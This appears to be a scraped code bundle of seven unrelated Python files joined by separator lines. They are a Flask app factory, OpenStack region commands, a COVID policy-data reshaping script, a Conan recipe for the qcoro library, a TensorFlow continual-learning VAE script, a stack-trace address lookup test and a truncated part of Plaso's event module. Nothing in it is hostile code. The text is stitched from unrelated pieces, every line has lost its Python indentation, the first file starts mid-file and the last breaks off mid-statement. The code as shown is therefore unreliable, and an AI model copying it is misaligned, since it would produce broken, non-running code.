from views.download import download_blueprint
from views.wizard_view import wizard_blueprint
def create_app(db_uri=None):
app = Flask(__name__)
# specify the env variable DATABASE_CONFIG to control the content of DATABASE_CONFIG
if db_uri:
if isinstance(db_uri, URL):
sqlalchemy_database_uri = db_uri
elif isinstance(db_uri, str):
sqlalchemy_database_uri = URL(db_uri)
else:
raise TypeError("db_uri must be url string or sqlalchemy URL object")
else:
sqlalchemy_database_uri = URL(**DATABASE_CONFIG)
app.config.from_mapping(
SQLALCHEMY_DATABASE_URI=sqlalchemy_database_uri,
SQLALCHEMY_TRACK_MODIFICATIONS=False,
VERSION=VERSION,
)
# register url blueprints with the app object
app.register_blueprint(dashboard_blueprint)
app.register_blueprint(upload_blueprint)
app.register_blueprint(admin_blueprint)
app.register_blueprint(download_blueprint)
if app.config.get("ENV") == DEVELOPMENT:
# only include the wizard blueprint when running in debug mode
app.register_blueprint(wizard_blueprint)
@app.context_processor
def get_dashboard_pages():
# used for the navigation bar
available_pages = app.config.get(APP_CONFIG_JSON).get(AVAILABLE_PAGES, [])
dashboard_pages = create_labels_for_available_pages(available_pages)
return dict(dashboard_pages=dashboard_pages)
return app
def configure_app(app, config_dict, config_file_folder):
# write the config dict to app config as a read-only proxy of a mutable dict
app.config[APP_CONFIG_JSON] = MappingProxyType(config_dict)
config_file_folder = config_file_folder
app.config[CONFIG_FILE_FOLDER] = config_file_folder
app.config[AVAILABLE_PAGES_DICT] = make_pages_dict(
config_dict.get(AVAILABLE_PAGES, []), app.config[CONFIG_FILE_FOLDER]
)
configure_backend(app)
return app
def configure_backend(app, models_path="app_deploy_data.models"):
# setup steps unique to SQL-backended apps
if app.config[APP_CONFIG_JSON].get(DATA_BACKEND) in [POSTGRES]:
from database.sql_handler import SqlHandler, SqlDataInventory
app.db = SQLAlchemy()
engine = create_engine(
app.config[SQLALCHEMY_DATABASE_URI], convert_unicode=True
)
app.db_session = scoped_session(
sessionmaker(autocommit=False, autoflush=False, bind=engine)
)
app.db.init_app(app)
data_backend_class = SqlHandler
data_backend_writer = SqlDataInventory
models_imports = importlib.import_module(models_path)
app.Base = getattr(models_imports, "Base")
@app.teardown_appcontext
def shutdown_session(exception=None):
app.db_session.remove()
else:
from database.local_handler import LocalCSVHandler, LocalCSVDataInventory
data_backend_class = LocalCSVHandler
data_backend_writer = LocalCSVDataInventory
app.config.data_handler = data_backend_class
app.config.data_backend_writer = data_backend_writer
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""Identity v3 Region action implementations"""
import logging
from osc_lib.command import command
from osc_lib import exceptions
from osc_lib import utils
import six
from openstackclient.i18n import _
LOG = logging.getLogger(__name__)
class CreateRegion(command.ShowOne):
_description = _("Create new region")
def get_parser(self, prog_name):
parser = super(CreateRegion, self).get_parser(prog_name)
# NOTE(stevemar): The API supports an optional region ID, but that
# seems like poor UX, we will only support user-defined IDs.
parser.add_argument(
'region',
metavar='<region-id>',
help=_('New region ID'),
)
parser.add_argument(
'--parent-region',
metavar='<region-id>',
help=_('Parent region ID'),
)
parser.add_argument(
'--description',
metavar='<description>',
help=_('New region description'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
region = identity_client.regions.create(
id=parsed_args.region,
parent_region=parsed_args.parent_region,
description=parsed_args.description,
)
region._info['region'] = region._info.pop('id')
region._info['parent_region'] = region._info.pop('parent_region_id')
region._info.pop('links', None)
return zip(*sorted(six.iteritems(region._info)))
class DeleteRegion(command.Command):
_description = _("Delete region(s)")
def get_parser(self, prog_name):
parser = super(DeleteRegion, self).get_parser(prog_name)
parser.add_argument(
'region',
metavar='<region-id>',
nargs='+',
help=_('Region ID(s) to delete'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
result = 0
for i in parsed_args.region:
try:
identity_client.regions.delete(i)
except Exception as e:
result += 1
LOG.error(_("Failed to delete region with "
"ID '%(region)s': %(e)s"), {'region': i, 'e': e})
if result > 0:
total = len(parsed_args.region)
msg = (_("%(result)s of %(total)s regions failed "
"to delete.") % {'result': result, 'total': total})
raise exceptions.CommandError(msg)
class ListRegion(command.Lister):
_description = _("List regions")
def get_parser(self, prog_name):
parser = super(ListRegion, self).get_parser(prog_name)
parser.add_argument(
'--parent-region',
metavar='<region-id>',
help=_('Filter by parent region ID'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
kwargs = {}
if parsed_args.parent_region:
kwargs['parent_region_id'] = parsed_args.parent_region
columns_headers = ('Region', 'Parent Region', 'Description')
columns = ('ID', 'Parent Region Id', 'Description')
data = identity_client.regions.list(**kwargs)
return (columns_headers,
(utils.get_item_properties(
s, columns,
formatters={},
) for s in data))
class SetRegion(command.Command):
_description = _("Set region properties")
def get_parser(self, prog_name):
parser = super(SetRegion, self).get_parser(prog_name)
parser.add_argument(
'region',
metavar='<region-id>',
help=_('Region to modify'),
)
parser.add_argument(
'--parent-region',
metavar='<region-id>',
help=_('New parent region ID'),
)
parser.add_argument(
'--description',
metavar='<description>',
help=_('New region description'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
kwargs = {}
if parsed_args.description:
kwargs['description'] = parsed_args.description
if parsed_args.parent_region:
kwargs['parent_region'] = parsed_args.parent_region
identity_client.regions.update(parsed_args.region, **kwargs)
class ShowRegion(command.ShowOne):
_description = _("Display region details")
def get_parser(self, prog_name):
parser = super(ShowRegion, self).get_parser(prog_name)
parser.add_argument(
'region',
metavar='<region-id>',
help=_('Region to display'),
)
return parser
def take_action(self, parsed_args):
identity_client = self.app.client_manager.identity
region = utils.find_resource(identity_client.regions,
parsed_args.region)
region._info['region'] = region._info.pop('id')
region._info['parent_region'] = region._info.pop('parent_region_id')
region._info.pop('links', None)
return zip(*sorted(six.iteritems(region._info)))
|
<gh_stars>0
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Nov 3 14:09:09 2020
@author: hamishgibbs
"""
import pandas as pd
import re
import numpy as np
#%%
ox = pd.read_csv('https://raw.githubusercontent.com/OxCGRT/covid-policy-tracker/master/data/OxCGRT_latest_withnotes.csv')
#%%
def melt_oxcgrt(ox, drop_columns = [], sep = 'XXXXX', quick = False, quiet = True):
keep_columns = list(set(ox.columns).difference(set(drop_columns)))
ox = ox[keep_columns]
full_value_names, value_names, stub_names = get_names(ox)
id_columns = list(set(ox.columns).difference(set(full_value_names)))
#only use first columns for a quick run
if quick:
value_names = value_names[0:2]
stub_names = stub_names[0:2]
for i, k in enumerate(value_names):
value_name = value_names[i]
stub = stub_names[i]
stub_cols = [x for x in ox.columns if stub in x]
ox[stub] = ox.apply(lambda x: value_name + sep + sep.join([str(s) for s in x[stub_cols]]), axis=1)
if not quiet:
print(stub)
ox_melted = pd.melt(ox[id_columns + stub_names], id_columns, stub_names)
ox_expand = ox_melted['value'].str.split(sep, expand=True)
ox_expand.columns = ['measure', 'value', 'flag', 'notes']
ox_expand[id_columns] = ox_melted[id_columns]
return(ox_expand)
def get_names(ox):
stub_exp = r'[A-Z][0-9]+_'
full_value_names = [match for match in ox.columns if re.findall(stub_exp , match) != []]
value_names = [x for x in full_value_names if 'Flag' not in x]
value_names = [x for x in value_names if 'Notes' not in x]
stub_names = [x.split('_')[0] for x in value_names]
return(full_value_names, value_names, stub_names)
#%%
drop_columns = ['ConfirmedCases',
'ConfirmedDeaths', 'StringencyIndex', 'StringencyIndexForDisplay',
'StringencyLegacyIndex', 'StringencyLegacyIndexForDisplay',
'GovernmentResponseIndex', 'GovernmentResponseIndexForDisplay',
'ContainmentHealthIndex', 'ContainmentHealthIndexForDisplay',
'EconomicSupportIndex', 'EconomicSupportIndexForDisplay']
#%%
ox_melted = melt_oxcgrt(ox, drop_columns, quick = True, quiet = False)
#%%
sep = 'XXXXX'
for i, k in enumerate(value_names[0:2]):
value_name = value_names[i]
stub = stub_names[i]
stub_cols = [x for x in ox.columns if stub in x]
ox[stub] = ox.apply(lambda x: value_name + sep + sep.join([str(s) for s in x[stub_cols]]), axis=1)
print(i)
#%%
ox_melted = pd.melt(ox[['Date'] + stub_names[0:2]], 'Date', stub_names[0:2])
#%%
v = ox_melted['value'].str.split(sep, expand=True)
v.columns = ['measure', 'value', 'flag', 'notes']
v['Date'] = ox_melted['Date'] |
<reponame>kokounet/conan-center-index
from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
required_conan_version = ">=1.33.0"
class QCoroConan(ConanFile):
name = "qcoro"
license = "MIT"
homepage = "https://github.com/danvratil/qcoro"
url = "https://github.com/conan-io/conan-center-index"
description = "C++ Coroutines for Qt."
topics = ("coroutines", "qt")
settings = "os", "compiler", "build_type", "arch"
options = {
"shared": [True, False],
"fPIC": [True, False],
"asan": [True, False],
}
default_options = {
"shared": False,
"fPIC": True,
"asan": False,
}
generators = "cmake", "cmake_find_package_multi"
exports_sources = ["CMakeLists.txt"]
_cmake = None
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _build_subfolder(self):
return "build_subfolder"
@property
def _compilers_minimum_version(self):
minimum_versions = {
"gcc": "10",
"Visual Studio": "17",
"msvc": "19.29",
"clang": "8",
"apple-clang": "13"
}
return minimum_versions
def config_options(self):
if self.settings.os == "Windows":
del self.options.fPIC
def configure(self):
if self.options.shared:
del self.options.fPIC
def build_requirements(self):
self.build_requires("cmake/3.21.3")
def requirements(self):
self.requires("qt/6.2.2")
self.requires("expat/2.4.2", override=True)
def validate(self):
if self.settings.compiler.cppstd:
tools.check_min_cppstd(self, 20)
def lazy_lt_semver(v1, v2):
lv1 = [int(v) for v in v1.split(".")]
lv2 = [int(v) for v in v2.split(".")]
min_length = min(len(lv1), len(lv2))
return lv1[:min_length] < lv2[:min_length]
#Special check for clang that can only be linked to libc++
if self.settings.compiler == "clang" and self.settings.compiler.libcxx != "libc++":
raise ConanInvalidConfiguration("imagl requires some C++20 features, which are available in libc++ for clang compiler.")
compiler_version = str(self.settings.compiler.version)
minimum_version = self._compilers_minimum_version.get(str(self.settings.compiler), False)
if not minimum_version:
self.output.warn("qcoro requires C++20. Your compiler is unknown. Assuming it supports C++20.")
elif lazy_lt_semver(compiler_version, minimum_version):
raise ConanInvalidConfiguration("qcoro requires some C++20 features, which your {} {} compiler does not support.".format(str(self.settings.compiler), compiler_version))
else:
print("Your compiler is {} {} and is compatible.".format(str(self.settings.compiler), compiler_version))
def source(self):
tools.get(**self.conan_data["sources"][self.version],
destination=self._source_subfolder, strip_root=True)
def _configure_cmake(self):
if self._cmake:
return self._cmake
self._cmake = CMake(self)
self._cmake.definitions["QCORO_BUILD_EXAMPLES"] = False
self._cmake.definitions["QCORO_ENABLE_ASAN"] = self.options.asan
self._cmake.definitions["BUILD_TESTING"] = False
self._cmake.definitions["QCORO_WITH_QTDBUS"] = self.options["qt"].with_dbus
self._cmake.configure(build_folder=self._build_subfolder)
return self._cmake
def build(self):
for patch in self.conan_data.get("patches", {}).get(self.version, []):
tools.patch(**patch)
cmake = self._configure_cmake()
cmake.build()
def package(self):
self.copy("*", dst="licenses", src=os.path.join(self._source_subfolder, "LICENSES"))
cmake = self._configure_cmake()
cmake.install()
for mask in ["Find*.cmake", "*Config*.cmake", "*-config.cmake", "*Targets*.cmake"]:
tools.remove_files_by_mask(self.package_folder, mask)
def package_info(self):
self.cpp_info.filenames["cmake_find_package"] = "QCoro6"
self.cpp_info.filenames["cmake_find_package_multi"] = "QCoro6"
self.cpp_info.set_property("cmake_file_name", "QCoro6")
self.cpp_info.names["cmake_find_package"] = "QCoro"
self.cpp_info.names["cmake_find_package_multi"] = "QCoro"
self.cpp_info.components["qcoro-core"].set_property("cmake_target_name", "QCoro::Core")
self.cpp_info.components["qcoro-core"].names["cmake_find_package"] = "Core"
self.cpp_info.components["qcoro-core"].names["cmake_find_package_multi"] = "Core"
self.cpp_info.components["qcoro-core"].libs = ["QCoro6Core"]
self.cpp_info.components["qcoro-core"].includedirs.append(os.path.join("include", "qcoro6", "qcoro"))
self.cpp_info.components["qcoro-core"].requires = ["qt::qtCore"]
self.cpp_info.components["qcoro-core"].build_modules["cmake_find_package"].append(os.path.join("lib", "cmake", "QCoro6Coro", "QCoroMacros.cmake"))
self.cpp_info.components["qcoro-core"].build_modules["cmake_find_package_multi"].append(os.path.join("lib", "cmake", "QCoro6Coro", "QCoroMacros.cmake"))
self.cpp_info.components["qcoro-core"].builddirs.append(os.path.join("lib", "cmake", "QCoro6Coro"))
self.cpp_info.components["qcoro-network"].set_property("cmake_target_name", "QCoro::Network")
self.cpp_info.components["qcoro-network"].names["cmake_find_package"] = "Network"
self.cpp_info.components["qcoro-network"].names["cmake_find_package_multi"] = "Network"
self.cpp_info.components["qcoro-network"].libs = ["QCoro6Network"]
self.cpp_info.components["qcoro-network"].requires = ["qt::qtNetwork"]
if self.options["qt"].with_dbus:
self.cpp_info.components["qcoro-dbus"].set_property("cmake_target_name", "QCoro::DBus")
self.cpp_info.components["qcoro-dbus"].names["cmake_find_package"] = "DBus"
self.cpp_info.components["qcoro-dbus"].names["cmake_find_package_multi"] = "DBus"
self.cpp_info.components["qcoro-dbus"].libs = ["QCoroDBus"]
self.cpp_info.components["qcoro-core"].requires = ["qt::qtDBus"]
|
import numpy as np
import tensorflow as tf
import sys, os
sys.path.extend(['alg/', 'models/'])
from visualisation import plot_images
from encoder_no_shared import encoder, recon
from utils import init_variables, save_params, load_params, load_data
from eval_test_ll import construct_eval_func
dimZ = 50
dimH = 500
n_channel = 128
batch_size = 50
lr = 1e-4
K_mc = 10
checkpoint = -1
def main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd):
# set up dataset specific stuff
from config import config
labels, n_iter, dimX, shape_high, ll = config(data_name, n_channel)
if data_name == 'mnist':
from mnist import load_mnist
if data_name == 'notmnist':
from notmnist import load_notmnist
# import functionalities
if method == 'onlinevi':
from bayesian_generator import generator_head, generator_shared, \
generator, construct_gen
from onlinevi import construct_optimizer, init_shared_prior, \
update_shared_prior, update_q_sigma
if method in ['ewc', 'noreg', 'laplace', 'si']:
from generator import generator_head, generator_shared, generator, construct_gen
if method in ['ewc', 'noreg']:
from vae_ewc import construct_optimizer, lowerbound
if method == 'ewc': from vae_ewc import update_ewc_loss, compute_fisher
if method == 'laplace':
from vae_laplace import construct_optimizer, lowerbound
from vae_laplace import update_laplace_loss, compute_fisher, init_fisher_accum
if method == 'si':
from vae_si import construct_optimizer, lowerbound, update_si_reg
# then define model
n_layers_shared = 2
batch_size_ph = tf.placeholder(tf.int32, shape=(), name='batch_size')
dec_shared = generator_shared(dimX, dimH, n_layers_shared, 'sigmoid', 'gen')
# initialise sessions
config = tf.ConfigProto()
config.gpu_options.allow_growth = True
sess = tf.Session(config=config)
string = method
if method in ['ewc', 'laplace', 'si']:
string = string + '_lbd%.1f' % lbd
if method == 'onlinevi' and K_mc > 1:
string = string + '_K%d' % K_mc
path_name = data_name + '_%s/' % string
if not os.path.isdir('save/'):
os.mkdir('save/')
if not os.path.isdir('save/'+path_name):
os.mkdir('save/'+path_name)
print('create path save/' + path_name)
filename = 'save/' + path_name + 'checkpoint'
if checkpoint < 0:
print('training from scratch')
old_var_list = init_variables(sess)
else:
load_params(sess, filename, checkpoint)
checkpoint += 1
# visualise the samples
N_gen = 10**2
path = 'figs/' + path_name
if not os.path.isdir('figs/'):
os.mkdir('figs/')
if not os.path.isdir(path):
os.mkdir(path)
print('create path ' + path)
X_ph = tf.placeholder(tf.float32, shape=(batch_size, dimX), name = 'x_ph')
# now start fitting
N_task = len(labels)
gen_ops = []
X_valid_list = []
X_test_list = []
eval_func_list = []
result_list = []
if method == 'onlinevi':
shared_prior_params = init_shared_prior()
if method in ['ewc', 'noreg']:
ewc_loss = 0.0
if method == 'laplace':
F_accum = init_fisher_accum()
laplace_loss = 0.0
if method == 'si':
old_params_shared = None
si_reg = None
n_layers_head = 2
n_layers_enc = n_layers_shared + n_layers_head - 1
for task in range(1, N_task+1):
# first load data
if data_name == 'mnist':
X_train, X_test, _, _ = load_mnist(digits = labels[task-1], conv = False)
if data_name == 'notmnist':
X_train, X_test, _, _ = load_notmnist(digits = labels[task-1], conv = False)
N_train = int(X_train.shape[0] * 0.9)
X_valid_list.append(X_train[N_train:])
X_train = X_train[:N_train]
X_test_list.append(X_test)
# define the head net and the generator ops
dec = generator(generator_head(dimZ, dimH, n_layers_head, 'gen_%d' % task), dec_shared)
enc = encoder(dimX, dimH, dimZ, n_layers_enc, 'enc_%d' % task)
gen_ops.append(construct_gen(dec, dimZ, sampling=False)(N_gen))
print('construct eval function...')
eval_func_list.append(construct_eval_func(X_ph, enc, dec, ll, \
batch_size_ph, K = 100, sample_W = False))
# then construct loss func and fit func
print('construct fit function...')
if method == 'onlinevi':
fit = construct_optimizer(X_ph, enc, dec, ll, X_train.shape[0], batch_size_ph, \
shared_prior_params, task, K_mc)
if method in ['ewc', 'noreg']:
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], ewc_loss)
if method == 'ewc':
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'laplace':
bound = lowerbound(X_ph, enc, dec, ll)
fit = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0], laplace_loss)
fisher, var_list = compute_fisher(X_ph, batch_size_ph, bound, X_train.shape[0])
if method == 'si':
bound = lowerbound(X_ph, enc, dec, ll)
fit, shared_var_list = construct_optimizer(X_ph, batch_size_ph, bound, X_train.shape[0],
si_reg, old_params_shared, lbd)
if old_params_shared is None:
old_params_shared = sess.run(shared_var_list)
# initialise all the uninitialised stuff
old_var_list = init_variables(sess, old_var_list)
# start training for each task
if method == 'si':
new_params_shared, w_params_shared = fit(sess, X_train, n_iter, lr)
else:
fit(sess, X_train, n_iter, lr)
# plot samples
x_gen_list = sess.run(gen_ops, feed_dict={batch_size_ph: N_gen})
for i in range(len(x_gen_list)):
plot_images(x_gen_list[i], shape_high, path, \
data_name+'_gen_task%d_%d' % (task, i+1))
x_list = [x_gen_list[i][:1] for i in range(len(x_gen_list))]
x_list = np.concatenate(x_list, 0)
tmp = np.zeros([10, dimX])
tmp[:task] = x_list
if task == 1:
x_gen_all = tmp
else:
x_gen_all = np.concatenate([x_gen_all, tmp], 0)
# print test-ll on all tasks
tmp_list = []
for i in range(len(eval_func_list)):
print('task %d' % (i+1), end=' ')
test_ll = eval_func_list[i](sess, X_valid_list[i])
tmp_list.append(test_ll)
result_list.append(tmp_list)
# save param values
save_params(sess, filename, checkpoint)
checkpoint += 1
# update regularisers/priors
if method == 'ewc':
# update EWC loss
print('update ewc loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
ewc_loss = update_ewc_loss(sess, ewc_loss, var_list, fisher, lbd, X_batch)
if method == 'laplace':
# update EWC loss
print('update laplace loss...')
X_batch = X_train[np.random.permutation(list(range(X_train.shape[0])))[:batch_size]]
laplace_loss, F_accum = update_laplace_loss(sess, F_accum, var_list, fisher, lbd, X_batch)
if method == 'onlinevi':
# update prior
print('update prior...')
shared_prior_params = update_shared_prior(sess, shared_prior_params)
# reset the variance of q
update_q_sigma(sess)
if method == 'si':
# update regularisers/priors
print('update SI big omega matrices...')
si_reg, _ = update_si_reg(sess, si_reg, new_params_shared, \
old_params_shared, w_params_shared)
old_params_shared = new_params_shared
plot_images(x_gen_all, shape_high, path, data_name+'_gen_all')
for i in range(len(result_list)):
print(result_list[i])
# save results
if not os.path.isdir("results/"):
os.mkdir("results/")
fname = 'results/' + data_name + '_%s.pkl' % string
import pickle
with open(fname, 'wb') as f:
pickle.dump(result_list, f)
print('test-ll results saved in', fname)
if __name__ == '__main__':
data_name = str(sys.argv[1])
method = str(sys.argv[2])
assert method in ['noreg', 'laplace', 'ewc', 'si', 'onlinevi']
if method == 'onlinevi':
lbd = 1.0 # some placeholder, doesn't matter
else:
lbd = float(sys.argv[3])
main(data_name, method, dimZ, dimH, n_channel, batch_size, K_mc, checkpoint, lbd)
|
#! /usr/bin/env python3.3
# Virtual memory analysis scripts.
# Developed 2012-2014 by <NAME>, <EMAIL>
# Copyright (c) 2012-2014 <NAME> and University of Washington
from util.pjh_utils import * #this is going to fail if not in top-level dir...
from ip_to_fn import *
# Main:
if __name__ == '__main__':
tag = 'main'
# The way to use this test file is to first do a test application run
# (i.e. of hello-world) with userstacktraces active. Then, look at
# the maps files from the run to see where the r-xpf vmas for
# hello-world and libc started in the address space, and fill in
# the hw_addr and libc_addr below. Then, look at an actual stacktrace
# that's printed (see example below) and fill in the test 'addr'
# values below, and check that the output of this script matches
# what you see when you run "objdump -d " on hello-world and libc.
helloworld = '/home/pjh/research/virtual/apps/test-programs/hello-world'
hw_addr = int('0x00400000', 16)
#libc = '/lib/x86_64-linux-gnu/libc-2.15.so'
libc = '/home/pjh/research/virtual/glibc-testinstall/lib/libc-2.17.so'
libc_addr = int('0x7fdfb405d000', 16)
ip_to_fn = ip_to_fn_converter()
'''
# An actual userstacktrace: line 2337 in
# measurement_results/20130918-11.28.18/manual-app-1/trace-events-full
hello-world-6948 [001] .... 74981.051938: <user stack trace>
[001] => <00007fdfb41472fa>
[001] => <00007fdfb40d722c>
[001] => <00007fdfb40d6688>
[001] => <00007fdfb40d5815>
[001] => <00007fdfb40a427f>
[001] => <00007fdfb40aee08>
[001] => <000000000040081c>
[001] => <00000000004008f5>
[001] => <00007fdfb407e995>
[001] => <00000000004006d9>
libc-2.17.so start-addr: 0x7fdfb405d000
hello-world start-addr: 0x000000400000
Expected output (bottom of stack towards top):
lookup 0x4006d9 in helloworld: _start
lookup 0x7fdfb407e995 in libc: __libc_start_main
lookup 0x4008f5 in helloworld: main
lookup 0x40081c in helloworld: procedure
lookup 0x7fdfb40aee08 in libc: __printf
...
Makes sense, woooooooo!
'''
addr = int('00000000004006d9', 16)
fn = ip_to_fn.lookup(helloworld, addr, hw_addr)
print("lookup {} in helloworld: {}".format(hex(addr), fn))
addr = int('00007fdfb407e995', 16)
fn = ip_to_fn.lookup(libc, addr, libc_addr)
print("lookup {} in libc: {}".format(hex(addr), fn))
addr = int('00000000004008f5', 16)
fn = ip_to_fn.lookup(helloworld, addr, hw_addr)
print("lookup {} in helloworld: {}".format(hex(addr), fn))
addr = int('000000000040081c', 16)
fn = ip_to_fn.lookup(helloworld, addr, hw_addr)
print("lookup {} in helloworld: {}".format(hex(addr), fn))
addr = int('00007fdfb40aee08', 16)
fn = ip_to_fn.lookup(libc, addr, libc_addr)
print("lookup {} in libc: {}".format(hex(addr), fn))
ip_to_fn.close()
sys.exit(0)
else:
print('Must run stand-alone')
usage()
sys.exit(1)
|
<filename>plaso/lib/event.py
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2012 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""The core object definitions, e.g. the event object."""
import collections
import logging
import uuid
from plaso.formatters import manager as formatters_manager
from plaso.lib import timelib
from plaso.lib import utils
import pytz
class AnalysisReport(object):
"""Class that defines an analysis report."""
def __init__(self):
"""Initializes the analysis report."""
super(AnalysisReport, self).__init__()
self._anomalies = []
self._tags = []
def __unicode__(self):
"""Return an unicode string representation of the report."""
return self.GetString()
def GetAnomalies(self):
"""Retrieves the list of anomalies that are attached to the report."""
return self._anomalies
def GetString(self):
"""Return an unicode string representation of the report."""
# TODO: Make this a more complete function that includes images
# and the option of saving as a full fledged HTML document.
string_list = []
string_list.append(u'Report generated from: {0:s}'.format(self.plugin_name))
time_compiled = getattr(self, 'time_compiled', 0)
if time_compiled:
time_compiled = timelib.Timestamp.CopyToIsoFormat(time_compiled)
string_list.append(u'Generated on: {0:s}'.format(time_compiled))
filter_string = getattr(self, 'filter_string', '')
if filter_string:
string_list.append(u'Filter String: {0:s}'.format(filter_string))
string_list.append(u'')
string_list.append(u'Report text:')
string_list.append(self.text)
return u'\n'.join(string_list)
def GetTags(self):
"""Retrieves the list of event tags that are attached to the report."""
return self._tags
# TODO: rename text to body?
def SetText(self, lines_of_text):
"""Sets the text based on a list of lines of text.
Args:
lines_of_text: a list containing lines of text.
"""
# Append one empty string to make sure a new line is added to the last
# line of text as well.
lines_of_text.append(u'')
self.text = u'\n'.join(lines_of_text)
# TODO: Re-design the event object to make it lighter, perhaps template
# based. The current design is too slow and needs to be improved.
class EventObject(object):
"""An event object is the main datastore for an event in plaso.
The framework is designed to parse files and create an event
from every single record, line or key extracted from the file.
An EventObject is the main data storage for an event in plaso.
This class defines the high level interface of EventObject.
Before creating an EventObject a class needs to be implemented
that inherits from EventObject and implements the functions in it.
The EventObject is then used by output processing for saving
in other forms, such as a protobuff, AFF4 container, CSV files,
databases, etc.
The goal of the EventObject is to provide a easily extensible
data storage of each events internally in the tool.
The main EventObject only exposes those functions that the
implementations need to implement. The functions that are needed
simply provide information about the event, or describe the
attributes that are necessary. How they are assembled is totally
up to the implementation.
All required attributes of the EventObject are passed to the
constructor of the object while the optional ones are set
using the method SetValue(attribute, value).
"""
# This is a convenience variable to define event object as
# simple value objects. Its runtime equivalent data_type
# should be used in code logic.
DATA_TYPE = ''
# This is a reserved variable just used for comparison operation and defines
# attributes that should not be used during evaluation of whether two
# EventObjects are the same.
COMPARE_EXCLUDE = frozenset([
'timestamp', 'inode', 'pathspec', 'filename', 'uuid',
'data_type', 'display_name', 'store_number', 'store_index', 'tag'])
def __init__(self):
"""Initializes the event object."""
self.uuid = uuid.uuid4().get_hex()
if self.DATA_TYPE:
self.data_type = self.DATA_TYPE
def EqualityString(self):
"""Return a string describing the EventObject in terms of object equality.
The details of this function must match the logic of __eq__. EqualityStrings
of two event objects should be the same if and only if the EventObjects are
equal as described in __eq__.
Returns:
String: will match another EventObject's Equality String if and only if
the EventObjects are equal
"""
fields = sorted(list(self.GetAttributes().difference(self.COMPARE_EXCLUDE)))
# TODO: Review this (after 1.1.0 release). Is there a better/more clean
# method of removing the timestamp description field out of the fields list?
parser = getattr(self, 'parser', u'')
if parser == u'filestat':
# We don't want to compare the timestamp description field when comparing
# filestat events. This is done to be able to join together FILE events
# that have the same timestamp, yet different description field (as in an
# event that has for instance the same timestamp for mtime and atime,
# joining it together into a single event).
try:
timestamp_desc_index = fields.index('timestamp_desc')
del fields[timestamp_desc_index]
except ValueError:
pass
basic = [self.timestamp, self.data_type]
attributes = []
for attribute in fields:
value = getattr(self, attribute)
if type(value) is dict:
attributes.append(sorted(value.items()))
elif type(value) is set:
attributes.append(sorted(list(value)))
else:
attributes.append(value)
identity = basic + [x for pair in zip(fields, attributes) for x in pair]
if parser == 'filestat':
inode = getattr(self, 'inode', 'a')
if inode == 'a':
inode = '_' + str(uuid.uuid4())
identity.append('inode')
identity.append(inode)
return u'|'.join(map(unicode, identity))
def __eq__(self, event_object):
"""Return a boolean indicating if two EventObject are considered equal.
Compares two EventObject objects together and evaluates if they are
the same or close enough to be considered to represent the same event.
For two EventObject objects to be considered the same they need to
have the following conditions:
+ Have the same timestamp.
+ Have the same data_type value.
+ Have the same set of attributes.
+ Compare all other attributes than those that are reserved, and
they all have to match.
The following attributes are considered to be 'reserved' and not used
for the comparison, so they may be different yet the EventObject is still
considered to be equal:
+ inode
+ pathspec
+ filename
+ display_name
+ store_number
+ store_index
Args:
event_object: The EventObject that is being compared to this one.
Returns:
True: if both EventObjects are considered equal, otherwise False.
"""
# Note: if this method changes, the above EqualityString method MUST be
# updated as well
if not isinstance(event_object, EventObject):
return False
if self.timestamp != event_object.timestamp:
return False
if self.data_type != event_object.data_type:
return False
attributes = self.GetAttributes()
if attributes != event_object.GetAttributes():
return False
# Here we have to deal with "near" duplicates, so not all attributes
# should be compared.
for attribute in attributes.difference(self.COMPARE_EXCLUDE):
if getattr(self, attribute) != getattr(event_object, attribute):
return False
# If we are dealing with the stat parser the inode number is the one
# attribute that really matters, unlike others.
if 'filestat' in getattr(self, 'parser', ''):
return utils.GetUnicodeString(getattr(
self, 'inode', 'a')) == utils.GetUnicodeString(getattr(
event_object, 'inode', 'b'))
return True
def GetAttributes(self):
"""Return a list of all defined attributes."""
return set(self.__dict__.keys())
def GetValues(self):
"""Returns a dictionary of all defined attributes and their values."""
values = {}
for attribute_name in self.GetAttributes():
values[attribute_name] = getattr(self, attribute_name)
return values
def GetString(self):
"""Return a unicode string representation of an EventObject."""
return unicode(self)
def __str__(self):
"""Return a string object of the EventObject."""
return unicode(self).encode('utf-8')
def __unicode__(self):
"""Print a human readable string from the EventObject."""
out_write = []
out_write.append(u'+-' * 40)
out_write.append(u'[Timestamp]:\n {0:s}'.format(
timelib.Timestamp.CopyToIsoFormat(self.timestamp)))
out_write.append(u'\n[Message Strings]:')
# TODO: move formatting testing to a formatters (manager) test.
event_formatter = formatters_manager.EventFormatterManager.GetFormatter(
self)
if not event_formatter:
out_write.append(u'None')
else:
msg, msg_short = event_formatter.GetMessages(self)
source_short, source_long = event_formatter.GetSources(self)
out_write.append(u'{2:>7}: {0}\n{3:>7}: {1}\n'.format(
